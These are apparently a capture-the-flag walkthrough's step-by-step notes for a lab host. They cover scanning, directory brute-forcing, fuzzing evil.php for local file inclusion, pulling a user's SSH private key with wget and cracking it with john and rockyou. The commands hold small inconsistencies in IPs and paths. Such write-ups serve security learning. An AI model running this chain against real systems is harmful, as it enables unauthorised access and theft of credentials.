1. NMAP 10.10.20.0/24

    Results: 10.10.20.50
            

2. dirb http://10.10.30.61 

    Results (4): 
            http://10.10.20.50/index.html
            http://10.10.20.50/robots.txt     (hello H4x0r)
            http://10.10.20.50/secret
            http://10.10.20.50/secret/index.html

3. dirb http://10.10.20.50/secret

    Results: http://10.10.20.50/secret/index.html

4. dirbuster

    http:10.10.20.50/secret/
    directory-list-lowercase-2.3-medium.txt

    Results: /secret/evil.php

5. ffuf

    ffuf -u http://10.10.20.50/secret/evil.php?FUZZ=/etc/passwd -w directory-list-2.3-small.txt -fs 0

5. URL

    http://10.10.20.50/secret.evil.php?FUZZ=/etc/passwd

    user: mowree

6. password

    http://10.10.20.50/secret.evil.php?FUZZ=/home/mowree/.ssh/id_rsa

    wget http://10.10.20.50/secret.evil.php?FUZZ=/home/mowree/.ssh/id_rsa -O key

7. chmod "key"

    chmod 600 key

8. ssh2john

    ssh2john key > key.hash

9. crach key.hash

    john key.hash --wordlist=rockyou.txt

